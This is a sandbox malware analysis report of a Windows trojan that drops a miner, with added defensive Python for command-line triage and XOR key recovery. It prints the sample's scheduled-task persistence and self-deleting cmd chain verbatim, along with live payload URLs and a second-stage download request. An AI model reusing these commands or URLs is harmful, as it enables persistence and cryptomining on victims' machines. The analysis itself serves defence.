
Windows Analysis Report
QHSgso4hXH.exe

Overview

General Information

Sample Name: QHSgso4hXH.exe
Analysis ID: 749056
MD5: 2f8df206ba700503dbebf59e937af0ec
SHA1: 7c36d57af94f2dd16a62c09356b4ef2c63e456fd
SHA256: 6bb1564eca89071edd9c42b84481aed5f3f5aaccedb8f61d6fb892b7f08bdca7
Tags: 32, exe, trojan

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Sigma detected: Schedule binary from dotnet directory
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Injects a PE file into a foreign processes
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

[Classification radar chart: categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale clean / suspicious / malicious]
  • System is w10x64
  • QHSgso4hXH.exe (PID: 2840 cmdline: C:\Users\user\Desktop\QHSgso4hXH.exe MD5: 2F8DF206BA700503DBEBF59E937AF0EC)
    • ngentask.exe (PID: 3128 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe MD5: ED7F195F7121781CC3D380942765B57D)
      • cmd.exe (PID: 2148 cmdline: C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • chcp.com (PID: 5432 cmdline: chcp 65001 MD5: 561054CF9C4B2897E80D7E7D9027FED9)
        • PING.EXE (PID: 5416 cmdline: ping 127.0.0.1 MD5: 70C24A306F768936563ABDADB9CA9108)
        • schtasks.exe (PID: 5592 cmdline: schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
        • ngentask.exe (PID: 5788 cmdline: "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" MD5: ED7F195F7121781CC3D380942765B57D)
          • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • ngentask.exe (PID: 4512 cmdline: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe MD5: ED7F195F7121781CC3D380942765B57D)
    • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • ngentask.exe (PID: 5420 cmdline: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe MD5: ED7F195F7121781CC3D380942765B57D)
    • conhost.exe (PID: 4912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • ngentask.exe (PID: 684 cmdline: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe MD5: ED7F195F7121781CC3D380942765B57D)
    • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
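The cmd.exe command line under PID 2148 is the whole persistence routine in one chain: chcp 65001 switches the console code page, ping 127.0.0.1 is a few seconds of delay, schtasks registers a task named ngentask that runs the ServiceHub copy every minute at the highest run level, DEL removes the copy that was dropped into the .NET Framework directory (the parent process's own image), and START launches the persistent copy. The block below is an added example and not part of the Joe Sandbox report or its signatures: it parses that command line, taken verbatim from the tree above, the way a triage script over Sysmon event 1 or Security 4688 records would, and reports the traits a hunter would alert on. The parent-in-.NET-directory check mirrors what the Sigma hit listed under Signatures keys on; the rule ids, the ProcEvent record and the benign comparison event are constructed for the example.

```python
"""Triage of a cmd.exe persistence chain from process-creation telemetry.

Added example for this report; it is not Joe Sandbox code. SAMPLE_EVENT is the
cmd.exe launch from the process tree (PID 2148); BENIGN_EVENT and the rule ids
are constructed for the example.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon event 1 / Security 4688 style)."""
    image: str
    cmdline: str
    parent_image: str


DOTNET_FRAMEWORK_DIR = re.compile(r"\\Microsoft\.NET\\Framework(?:64)?\\v[\d.]+\\", re.I)
USER_WRITABLE_DIR = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.I)


def split_cmd_chain(payload: str) -> list[str]:
    """Split a cmd.exe payload on &&, || and & that sit outside double quotes.
    An unbalanced quote (as in the sample's final START) simply runs to the end."""
    parts, cur, in_quote, i = [], [], False, 0
    while i < len(payload):
        ch = payload[i]
        if ch == '"':
            in_quote = not in_quote
        if not in_quote and ch in "&|":
            if i + 1 < len(payload) and payload[i + 1] == ch:
                i += 1  # swallow the second half of && or ||
            parts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
        i += 1
    parts.append("".join(cur).strip())
    return [p for p in parts if p]


def tokens(segment: str) -> list[str]:
    """Quote-aware argv split; a quote without a closing partner runs to the end."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"?|\S+', segment)]


def parse_opts(toks: list[str]) -> dict:
    """Map /switch -> value (or True for a bare switch) for tools like schtasks."""
    opts, i = {}, 1
    while i < len(toks):
        key = toks[i].lower()
        if key.startswith("/") and i + 1 < len(toks) and not toks[i + 1].startswith("/"):
            opts[key] = toks[i + 1]
            i += 2
        else:
            opts[key] = True
            i += 1
    return opts


def analyze(ev: ProcEvent) -> dict:
    """Return {rule_id: detail} for every suspicious trait of one cmd.exe event."""
    hits = {}
    if ev.image.lower().endswith("\\cmd.exe") and DOTNET_FRAMEWORK_DIR.search(ev.parent_image):
        hits["dotnet_dir_spawns_cmd"] = ev.parent_image
    m = re.search(r"(?i)(?:^|\s)/[ck]\s+(.*)$", ev.cmdline)
    if not m:
        return hits
    segments = [tokens(s) for s in split_cmd_chain(m.group(1))]
    verbs = [s[0].lower() for s in segments if s]
    for seg in segments:
        if not seg:
            continue
        verb = seg[0].lower()
        if verb == "schtasks" and "/create" in (t.lower() for t in seg):
            opts = parse_opts(seg)
            target = opts.get("/tr", "")
            if isinstance(target, str) and USER_WRITABLE_DIR.search(target):
                hits["task_from_user_dir"] = target          # binary lives in a user-writable path
            if str(opts.get("/rl", "")).upper() == "HIGHEST":
                hits["task_rl_highest"] = opts.get("/tn", "?")
            if str(opts.get("/sc", "")).upper() == "MINUTE":
                hits["task_every_minute"] = opts.get("/tn", "?")
        elif verb in ("del", "erase"):
            target = next((t for t in seg[1:] if not t.startswith("/")), "")
            if target.lower() == ev.parent_image.lower():
                hits["deletes_parent_image"] = target        # self-removal of the dropper copy
    if "ping" in verbs and any(v in ("del", "erase") for v in verbs):
        hits["ping_delay_before_delete"] = " && ".join(verbs)
    return hits


# The cmd.exe launch recorded in the process tree above (PID 2148), verbatim.
SAMPLE_EVENT = ProcEvent(
    image=r"C:\Windows\SysWOW64\cmd.exe",
    cmdline=r'C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe',
    parent_image=r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe",
)
# Constructed benign comparison, not from the report.
BENIGN_EVENT = ProcEvent(
    image=r"C:\Windows\System32\cmd.exe",
    cmdline=r'cmd.exe /c schtasks /create /tn "NightlyBackup" /sc DAILY /tr "C:\Program Files\Backup\backup.exe" /f',
    parent_image=r"C:\Windows\explorer.exe",
)

if __name__ == "__main__":
    for ev in (SAMPLE_EVENT, BENIGN_EVENT):
        print(ev.image, analyze(ev))
```

On a live host the same facts can be confirmed with schtasks /query /tn ngentask /v and by hashing %LOCALAPPDATA%\ServiceHub\ngentask.exe against the dropped-file SHA-256 listed later in this report. Note also that the GET /library.bin request recorded under Networking returned a 404 text/html page, and the strings listed for advapi32.dll.0.dr are that site's WordPress markup, so the second-stage download does not appear to have succeeded in this run.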
No configs have been found
Yara matches (Source, Rule, Description, Author, Strings):
Source: 00000000.00000003.260166226.0000000002256000.00000040.00000800.00020000.00000000.sdmp
Rule: SUSP_XORed_Mozilla
Description: Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.
Author: Florian Roth
Strings:
  • 0xc7aba:$xo1: \x8E\xC3\xAC\xC3\xB9\xC3\xAA\xC3\xAF\xC3\xAF\xC3\xA2\xC3\xEC\xC3\xF6\xC3\xED\xC3\xF3\xC3

Source: 00000000.00000003.260166226.0000000002256000.00000040.00000800.00020000.00000000.sdmp
Rule: SUSP_XORed_MSDOS_Stub_Message
Description: Detects suspicious XORed MSDOS stub message
Author: Florian Roth
Strings:
  • 0x6e:$xo1: \x97\xAB\xAA\xB0\xE3\xB3\xB1\xAC\xA4\xB1\xA2\xAE\xE3\xA0\xA2\xAD\xAD\xAC\xB7\xE3\xA1\xA6\xE3\xB1\xB6\xAD\xE3\xAA\xAD\xE3\x87\x8C\x90\xE3\xAE\xAC\xA7\xA6

Malware Analysis System Evasion

Source: Process started | Author: Joe Security | Rule: Schedule binary from dotnet directory (listed under Signatures above)
Data:
  Command: C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
  CommandLine: (same as Command)
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\SysWOW64\cmd.exe
  NewProcessName: C:\Windows\SysWOW64\cmd.exe
  OriginalFileName: C:\Windows\SysWOW64\cmd.exe
  ParentCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
  ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
  ParentProcessId: 3128
  ParentProcessName: ngentask.exe
  ProcessCommandLine: (same as Command)
  ProcessId: 2148
  ProcessName: cmd.exe
No Snort rule has matched


AV Detection

Source: QHSgso4hXH.exe | ReversingLabs: Detection: 32%
Source: QHSgso4hXH.exe | Virustotal: Detection: 34%
Source: http://193.218.201.246/xmrig.exe | Avira URL Cloud: Label: malware
Source: QHSgso4hXH.exe | Joe Sandbox ML: detected
Source: 0.3.QHSgso4hXH.exe.c190000.0.unpack | Avira: Label: TR/ATRAPS.Gen
Source: 1.0.ngentask.exe.400000.0.unpack | Avira: Label: TR/ATRAPS.Gen
Source: 0.3.QHSgso4hXH.exe.c190000.1.unpack | Avira: Label: TR/ATRAPS.Gen
Source: QHSgso4hXH.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 160.153.50.70:443 -> 192.168.2.6:49702 version: TLS 1.2
Source: Binary string: NGenTask.pdb | source: ngentask.exe, 00000008.00000000.291902355.00000000006D2000.00000002.00000001.01000000.00000008.sdmp, ngentask.exe.1.dr

Networking

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View | IP Address: 160.153.50.70 160.153.50.70
Source: global traffic | HTTP traffic detected:
  GET /library.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
  Host: www.imarket-eg.com
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Fri, 18 Nov 2022 06:52:45 GMT
  Server: Apache
  X-Powered-By: PHP/7.4.33
  Expires: Wed, 11 Jan 1984 05:00:00 GMT
  Cache-Control: no-cache, must-revalidate, max-age=0
  Link: <https://www.imarket-eg.com/wp-json/>; rel="https://api.w.org/"
  Set-Cookie: _eshoob=1; expires=Fri, 25-Nov-2022 06:52:46 GMT; Max-Age=604800; path=/
  Upgrade: h2,h2c
  Connection: Upgrade, close
  Vary: Accept-Encoding
  Transfer-Encoding: chunked
  Content-Type: text/html; charset=UTF-8
Source: advapi32.dll.0.dr | String found in binary or memory:
  • <a href="https://www.facebook.com/imarketegypt/"> equals www.facebook.com (Facebook)
  • <a href="https://www.linkedin.com/in/imarket-marketing-agency-a80a82213/"> equals www.linkedin.com (Linkedin)
  • <a href="https://www.youtube.com/channel/UCoLhJ3CIgGI8Rvq_S_TkcFg"> equals www.youtube.com (Youtube)
  • src="https://www.facebook.com/tr?id=275694772967027&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
Source: ngentask.exe, 00000001.00000002.275257695.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory:
  • http://193.218.201.246/xmrig.exe
  • http://193.218.201.246/xmrig.exe(KKl
  • http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QHSgso4hXH.exe | String found in binary or memory:
  • http://vXsLjUXgEkdPUv.307xVYtdN0
  • https://www.imarket-eg.com/library.bin
Source: QHSgso4hXH.exe, 00000000.00000002.520178129.0000000002A1B000.00000040.00000800.00020000.00000000.sdmp | String found in binary or memory:
  • http://vXsLjUXgEkdPUv.307xVYtdN0h8WhldS19UlhMR80~
  • https://www.imarket-eg.com/library.bini3NC8vtbKWLvXsWnllFS6z1xMD07Gw9nfzJIj6wDIzGzCefljal5yvndAtCkYM
Source: advapi32.dll.0.dr | String found in binary or memory:
  • https://analytify.io/downloads/analytify-wordpress-plugin/
  • https://api.w.org/
  • https://connect.facebook.net/en_US/fbevents.js
  • https://fonts.googleapis.com/css?family=Poppins%3A100%2C100italic%2C200%2C200italic%2C300%2C300itali
  • https://fonts.gstatic.com
  • https://gmpg.org/xfn/11
  • https://instagram.com/imarketegypt?utm_medium=copy_link
  • https://twitter.com/imarketegypt
  • https://www.imarket-eg.com
  • https://www.imarket-eg.com/
  • https://www.imarket-eg.com/about-imarket/
  • https://www.imarket-eg.com/blog/
  • https://www.imarket-eg.com/branding/
  • https://www.imarket-eg.com/business-consulting/
  • https://www.imarket-eg.com/comments/feed/
  • https://www.imarket-eg.com/contact-us/
  • https://www.imarket-eg.com/contact-us/#
  • https://www.imarket-eg.com/designs/
  • https://www.imarket-eg.com/elementor-524/
  • https://www.imarket-eg.com/feed/
  • https://www.imarket-eg.com/google-ads/
  • https://www.imarket-eg.com/search-user-optimization/
  • https://www.imarket-eg.com/services/
  • https://www.imarket-eg.com/social-media-marketing/
  • https://www.imarket-eg.com/social-media/
  • https://www.imarket-eg.com/videography/
  • https://www.imarket-eg.com/web-design-2/
  • https://www.imarket-eg.com/web-design/
  • https://www.imarket-eg.com/wp-content/plugins/chaty/css/chaty-front.min.css?ver=1630326243
  • https://www.imarket-eg.com/wp-content/plugins/chaty/js/cht-front-script.js?ver=1630326243
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/de-product-display
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/de-sticky-frontend
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/de_loop/ecs-style.
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/dethemekit-de-caro
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/dethemekit-widgets
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/htflexboxgrid.css?
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/simple-line-icons.
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/slick.css?ver=1.5.
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de-active-icon-box.
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de-sticky-frontend.
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de_loop/ecs.js?ver=
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de_loop/ecs_ajax_pa
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/jquery-1.12.4-wp.js
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/jquery-migrate-1.4.
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/lib/ResizeSensor.mi
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/lib/jsticky/jquery.
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/lib/sticky-sidebar/
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/css/
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/a
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/d
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/i
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/l
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/m
  • https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/s
  • https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.3.0
  • https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.3.0
  • https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.mi
  • https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver
  • https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.
  • https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?v
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.4.8
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.4.8
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.4.8
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.4.8
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.4.8
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.cs
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);s
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#ei
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ve
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
  • https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.
  • https://www.imarket-eg.com/wp-content/plugins/wp-rocket/assets/js/lazyload/17.5/lazyload.min.js
  • https://www.imarket-eg.com/wp-content/themes/hello-elementor/style.min.css?ver=2.3.1
  • https://www.imarket-eg.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.3.1
  • https://www.imarket-eg.com/wp-content/uploads/2021/06/Logo-e1624927275244-300x96.png
  • https://www.imarket-eg.com/wp-content/uploads/2021/06/Logo-e1624927275244.png
  • https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-180x180.jpg
  • https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-192x192.jpg
  • https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-270x270.jpg
  • https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-32x32.jpg
  • https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-13.css?ver=1637579037
  • https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-164.css?ver=1637579040
  • https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-171.css?ver=1637579040
  • https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-196.css?ver=1637579583
  • https://www.imarket-eg.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.3
  • https://www.imarket-eg.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.1
  • https://www.imarket-eg.com/wp-includes/wlwmanifest.xml
  • https://www.imarket-eg.com/wp-json/
  • https://www.imarket-eg.com/xmlrpc.php?rsd
  • https://www.linkedin.com/in/imarket-marketing-agency-a80a82213/
  • https://www.youtube.com/channel/UCoLhJ3CIgGI8Rvq_S_TkcFg
Source: unknown | DNS traffic detected: queries for: vxsljuxgekdpuv.307xvytdn0
Source: 00000000.00000003.260166226.0000000002256000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 00000000.00000003.260166226.0000000002256000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
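Both Yara hits in this memory region are single-byte XOR findings: the rules use Yara's xor modifier, so they can report the match but not the key. The matched bytes printed in the Yara table near the top of the report are enough to recover it. The block below is an added example, not Joe Sandbox or Yara code: it brute-forces the key the way the CyberChef recipe in the reference field does, checking both ASCII and UTF-16LE because a wide "Mozilla/5.0" has a zero byte after every character that XORs to a constant, and it generalises the stub-message hit into a scan for an XOR-encoded PE header, deriving the key from the byte that should be "M" and confirming it against "Z" and the DOS stub message at its usual offset 0x4E. The two byte strings are copied from the Yara table; the buffer the scan runs over is constructed for the example.

```python
"""Recover the XOR key behind the two SUSP_XORed_* Yara hits.

Added example for this report, not Joe Sandbox or Yara code. MOZILLA_MATCH and
DOS_STUB_MATCH are the $xo1 bytes from the Yara table; build_sample_buffer()
is a constructed input for the PE-header scan.
"""

MOZILLA_MATCH = bytes.fromhex("8EC3ACC3B9C3AAC3AFC3AFC3A2C3ECC3F6C3EDC3F3C3")
DOS_STUB_MATCH = bytes.fromhex(
    "97ABAAB0E3B3B1ACA4B1A2AEE3A0A2ADADACB7E3A1A6E3B1B6ADE3AAADE3878C90E3AEACA7A6"
)
DOS_STUB_MESSAGE = b"This program cannot be run in DOS mode"
STUB_MESSAGE_OFFSET = 0x4E  # distance from "MZ" to the message in the usual linker stub


def xor(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def find_xor_key(blob: bytes, keyword: bytes) -> list[tuple[int, str]]:
    """Try all 256 single-byte keys (what CyberChef's XOR Brute Force does) and
    report those under which `keyword` appears, as ASCII or as UTF-16LE.
    A wide string has a zero byte after each character, so in the ciphertext
    every second byte is the key itself; checking both encodings catches that."""
    wide = keyword.decode("ascii").encode("utf-16-le")
    hits = []
    for key in range(256):
        plain = xor(blob, key)
        if keyword in plain:
            hits.append((key, "ascii"))
        if wide in plain:
            hits.append((key, "utf-16le"))
    return hits


def find_xored_pe(buf: bytes) -> list[tuple[int, int]]:
    """Scan for PE headers hidden by single-byte XOR: returns (offset, key).
    The key is derived from the byte that should be 'M' and confirmed against
    'Z' and the DOS stub message, so each offset costs one comparison, not 256.
    An unencoded PE shows up too, with key 0."""
    found = []
    last = len(buf) - STUB_MESSAGE_OFFSET - len(DOS_STUB_MESSAGE)
    for off in range(last + 1):
        key = buf[off] ^ ord("M")
        if buf[off + 1] ^ key != ord("Z"):
            continue
        start = off + STUB_MESSAGE_OFFSET
        if xor(buf[start:start + len(DOS_STUB_MESSAGE)], key) == DOS_STUB_MESSAGE:
            found.append((off, key))
    return found


def mz_offset_from_stub_hit(hit_offset: int) -> int:
    """Where "MZ" would sit if a stub-message hit at hit_offset belongs to a PE
    with the usual layout; a negative result means the layout is not standard."""
    return hit_offset - STUB_MESSAGE_OFFSET


def build_sample_buffer(key: int = 0xC3, at: int = 0x20) -> bytes:
    """Constructed test input: `at` bytes of filler, then a minimal DOS header
    (MZ, zero padding, the 14-byte stub code, the message) XORed with `key`."""
    stub_code = bytes.fromhex("0E1FBA0E00B409CD21B8014CCD21")
    header = b"MZ" + bytes(STUB_MESSAGE_OFFSET - 2 - len(stub_code)) + stub_code
    header += DOS_STUB_MESSAGE + b".\r\r\n$"
    return bytes(range(at)) + xor(header, key) + bytes(16)


if __name__ == "__main__":
    print("Mozilla/5.0 key candidates:", find_xor_key(MOZILLA_MATCH, b"Mozilla/5.0"))
    print("DOS stub key candidates:  ", find_xor_key(DOS_STUB_MATCH, DOS_STUB_MESSAGE))
    print("XORed PE headers in sample:", find_xored_pe(build_sample_buffer()))
    print("MZ offset implied by the 0x6e hit:", hex(mz_offset_from_stub_hit(0x6E)))
```

Both matches decode with key 0xC3, and the Mozilla string is stored as UTF-16LE. Because the stub-message hit sits at 0x6e in the dump, an MZ header with the usual layout would start at 0x20 of that region; that is the first offset to check before carving an embedded PE out of it, and the scan above applied to the whole dump is the way to confirm it rather than assume it.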
Source: C:\Users\user\Desktop\QHSgso4hXH.exe | Code functions:
  0_2_02A23A90, 0_2_02AC9AD0, 0_2_02AC5A20, 0_2_02ACCA20, 0_2_02ACA230, 0_2_02ACEA30, 0_2_02ABFA10, 0_2_02AC3260,
  0_2_02A78A50, 0_2_02ACDBA0, 0_2_02AC93B0, 0_2_02AAA390, 0_2_02AD0B90, 0_2_02AC1BF0, 0_2_02A793D0, 0_2_02AC5BD0,
  0_2_02ABF320, 0_2_02ACE320, 0_2_02A7DB10, 0_2_02AC2B70, 0_2_02AC1350, 0_2_02AC6350, 0_2_02ACF8A0, 0_2_02ACD880,
  0_2_02AC00D0, 0_2_02AC6020, 0_2_02AC7810, 0_2_02AC4060, 0_2_02ACB060, 0_2_02AD0050, 0_2_02AC89F0, 0_2_02ACD9F0,
  0_2_02ACA930, 0_2_02AC9910, 0_2_02ACF160, 0_2_02ACE160, 0_2_02AC3970, 0_2_02AC7170, 0_2_02AD0EA0, 0_2_02AC7EE0,
  0_2_02ACF6E0, 0_2_02AC1630, 0_2_02AC4E30, 0_2_02ACBE50, 0_2_02ACB780, 0_2_02AC4790, 0_2_02AC07D0, 0_2_02AC0F20,
  0_2_02ACE760, 0_2_02AD0750, 0_2_02AC24B0, 0_2_02AC54F0, 0_2_02AD1CC0, 0_2_02AC8CD0, 0_2_02ACC420, 0_2_02ACD400,
  0_2_02AC85A0, 0_2_02AC1DB0, 0_2_02A78D80, 0_2_02AC3D80, 0_2_02ACC5E0, 0_2_02ACFD20, 0_2_02ACCD20, 0_2_02AD1570
